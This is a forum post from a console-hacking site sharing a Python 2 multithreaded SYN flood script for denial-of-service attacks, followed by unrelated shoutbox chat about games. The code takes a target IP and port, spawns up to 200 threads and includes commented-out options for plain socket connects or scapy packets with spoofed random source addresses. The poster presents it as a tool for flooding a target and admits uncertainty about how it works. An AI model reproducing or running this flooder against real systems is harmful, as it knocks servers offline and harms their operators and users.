SynFlood Dos [Python]

  • Hello Guest! Welcome to ConsoleCrunch, to help support our site check out the premium upgrades HERE! to get exclusive access to our hidden content.
  • Unable to load portions of the website...
    If you use an ad blocker addon, you should disable it because it interferes with several elements of the site and blocks more than just adverts.
  • Read Rules Before Posting Post Virus Scans with every program.

ZionHD

Leader
Retired Staff
Nov 8, 2014
184
215
53
This script uses multiple threads to flood your target using the Syn/ACK 3 way handshake attack. This drops connections once it finishes the second step, I believe correct me if I'm wrong. This will make the target wait for a packet that will never come and cause it to be unresponsive. The reason it crashes or becomes unresponsive is because the server is consuming a lot of resources by waiting for a packet that will never come plus your flooding it repeatedly causing multiple connections to be opened. This is what I believe. This script is coded in python so it should end with .py if you save it on your pc or server.

Wiki's Definition of SynFlood:
A SYN flood is a form of denial-of-service attack in which an attacker sends a succession of SYN requests to a target's system in an attempt to consume enough server resources to make the system unresponsive to legitimate traffic.

Code:
#!/usr/bin/env python
#########################################
# 
# SYNflood.py - A multithreaded SYN Flooder
# By Brandon Smith
# brandon.smith@studiobebop.net
#
# This script is a demonstration of a SYN/ACK 3 Way Handshake Attack 
# as discussed by Halla of Information Leak
#
#########################################
import socket
import random
import sys
import threading
#import scapy # Uncomment this if you're planning to use Scapy

###
# Global Config
###

interface    = None
target       = None
port         = None
thread_limit = 200
total        = 0

#!# End Global Config #!#

class sendSYN(threading.Thread):
    global target, port
    def __init__(self):
        threading.Thread.__init__(self)

    def run(self):
        # There are two different ways you can go about pulling this off.
        # You can either:
        #   - 1. Just open a socket to your target on any old port
        #   - 2. Or you can be a cool kid and use scapy to make it look cool, and overcomplicated!
        #
        # (Uncomment whichever method you'd like to use)

        # Method 1 -
#        s = socket.socket()
#        s.connect((target,port))

        # Methods 2 -
#        i = scapy.IP()
#        i.src = "%i.%i.%i.%i" % (random.randint(1,254),random.randint(1,254),random.randint(1,254),random.randint(1,254))
#        i.dst = target

#        t = scapy.TCP()
#        t.sport = random.randint(1,65535)
#        t.dport = port
#        t.flags = 'S'

#        scapy.send(i/t, verbose=0)

if __name__ == "__main__":
    # Make sure we have all the arguments we need
    if len(sys.argv) != 4:
        print "Usage: %s <Interface> <Target IP> <Port>" % sys.argv[0]
        exit()

    # Prepare our variables
    interface        = sys.argv[1]
    target           = sys.argv[2]
    port             = int(sys.argv[3])
#    scapy.conf.iface = interface # Uncomment this if you're going to use Scapy

    # Hop to it!
    print "Flooding %s:%i with SYN packets." % (target, port)
    while True:
        if threading.activeCount() < thread_limit: 
            sendSYN().start()
            total += 1
            sys.stdout.write("\rTotal packets sent:\t\t\t%i" % total)
 
  • Like
Reactions: Saad Asad
General chit-chat
Help Users
  • @ lurch6661:
    i think soon on cod i wil be level 2
  • @ lurch6661:
    lol
  • @ QM|T_JinX:
    lolyou have to play first
  • @ lurch6661:
    wish i could fix my rank those players are to easy for you to kill
  • @ QM|T_JinX:
    what you mean ?\
  • @ lurch6661:
    like iam level 2
  • @ lurch6661:
    you are like 500
  • @ QM|T_JinX:
    on mw2 im 700 something lol
  • @ lurch6661:
    dont they put you in lobbies with the level that you are at
  • @ QM|T_JinX:
    most of the time ya
  • @ lurch6661:
    did you defeat elden ring
  • @ QM|T_JinX:
    if i play match with you and i joined you change is that for me they will be low lvl
  • @ QM|T_JinX:
    if you joined me you will have a very hard time hahah
  • @ lurch6661:
    lol
  • Chat Bot:
    GIORGAROS777 is our newest member. Welcome!
  • Chat Bot:
    christo dement is our newest member. Welcome!
  • Chat Bot:
  • Chat Bot:
    christo dement has joined the room.
  • Chat Bot:
    Christo has joined the room.
  • Chat Bot:
    lilzeal is our newest member. Welcome!
  • Chat Bot:
    christo dement has joined the room.
  • Chat Bot:
    illegalModsv1 has joined the room.
    Chat Bot: illegalModsv1 has joined the room.